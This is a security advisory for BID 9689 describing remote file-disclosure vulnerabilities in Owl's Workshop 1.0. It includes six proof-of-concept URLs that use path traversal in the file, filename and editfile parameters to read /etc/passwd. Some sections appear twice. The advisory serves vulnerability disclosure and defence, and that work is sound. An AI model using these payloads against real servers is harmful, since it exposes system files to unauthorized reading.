Owl's Workshop Multiple Remote File Disclosure Vulnerabilities
BID:9689
Info
Owl's Workshop Multiple Remote File Disclosure Vulnerabilities
| Bugtraq ID: | 9689 |
| Class: | Input Validation Error |
| CVE: |
CVE-2004-0302 CVE-2004-0303 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 18 2004 12:00AM |
| Updated: | Apr 05 2007 03:22AM |
| Credit: | Disclosure of this issue has been credited to G00db0y. |
| Vulnerable: |
Fool's Workshop Owl's Workshop 1.0 |
| Not Vulnerable: | |
Discussion
Owl's Workshop Multiple Remote File Disclosure Vulnerabilities
Owl's Workshop is reported prone to multiple remote file-disclosure vulnerabilities because the application fails to validate user-supplied input passed via a URI parameter.
Upon successful exploitation of these issues, an attacker may be able to gain access to sensitive system files, potentially facilitating further attacks.
Owl's Workshop is reported prone to multiple remote file-disclosure vulnerabilities because the application fails to validate user-supplied input passed via a URI parameter.
Upon successful exploitation of these issues, an attacker may be able to gain access to sensitive system files, potentially facilitating further attacks.
Exploit / POC
Owl's Workshop Multiple Remote File Disclosure Vulnerabilities
The following proofs of concept have been provided:
http://www.example.org/owls/glossaries/index.php?file=/etc/passwd
http://www.example.org/owls/multiplechoice/index.php?file=../../../../../../../../../../../../../../../etc/passwd&view=print
http://www.example.org/owls/readings/index.php?filename=/etc/passwd
http://www.example.org/owls/multiplechoice/resultsignore.php?filename=/etc/passwd
http://www.example.org/owls/workshop/glossary.php?editfile=../../../../../../../../../../../../../../../etc/passwd
http://www.example.org/owls/workshop/newmultiplechoice.php?edit=1&editfile=../../../../../../../../../../../../../../../etc/passwd
The following proofs of concept have been provided:
http://www.example.org/owls/glossaries/index.php?file=/etc/passwd
http://www.example.org/owls/multiplechoice/index.php?file=../../../../../../../../../../../../../../../etc/passwd&view=print
http://www.example.org/owls/readings/index.php?filename=/etc/passwd
http://www.example.org/owls/multiplechoice/resultsignore.php?filename=/etc/passwd
http://www.example.org/owls/workshop/glossary.php?editfile=../../../../../../../../../../../../../../../etc/passwd
http://www.example.org/owls/workshop/newmultiplechoice.php?edit=1&editfile=../../../../../../../../../../../../../../../etc/passwd
Solution / Fix
Owl's Workshop Multiple Remote File Disclosure Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
References
Owl's Workshop Multiple Remote File Disclosure Vulnerabilities
References:
References:
- Owl's Workshop Product Page (Fool's Workshop)
- ZH2004-08SA (security advisory): OWLS 1.0 Remote arbitrary files retrieving (ZetaLabs